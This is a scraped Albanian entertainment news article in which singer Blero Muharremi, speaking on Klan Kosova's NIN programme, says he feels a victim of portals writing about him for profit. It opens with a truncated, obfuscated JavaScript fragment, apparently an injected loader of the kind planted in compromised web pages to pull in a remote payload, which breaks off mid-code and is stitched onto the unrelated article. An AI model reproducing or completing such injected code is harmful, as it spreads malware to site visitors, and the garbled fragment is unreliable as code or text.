;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Blero ndihet viktimë

By

Sonte në emisionin NIN të Klan Kosova po diskutohet për showbizin dhe tendencën që krahas interesimit të madh të ketë paralelisht edhe kritika të rrepta nga vetë masa për masën që konsumon lajme të tilla.

Të ftuar në studio me Alaudin Hamitin, Donika Lamaxhemën e Donika Hoxhën janë Liberta Spahiu nga Prive, Vullnet Krasniqi nga Insajderi dhe këngëtari Blero Muharremi si një prej personave më të komentuar në këtë fushë.

Këngëtari i shumë hiteve duke folur për tendencën që mediat të merren shumë me të, ai tha se ndihet viktimë e mediave që bëjnë shkrime për përfitime materiale.

Blero tha se ndihet që portalet kanë krijuar një Blero të ri, i cili i tërhjek kurreshtjen edhe vetë atij për ta kuptuar e për ta lexuar gjatë kohës kur nuk është në gjendjen më të mirë shpirtërore. /Prive.al/

Artikuj të ngjashëm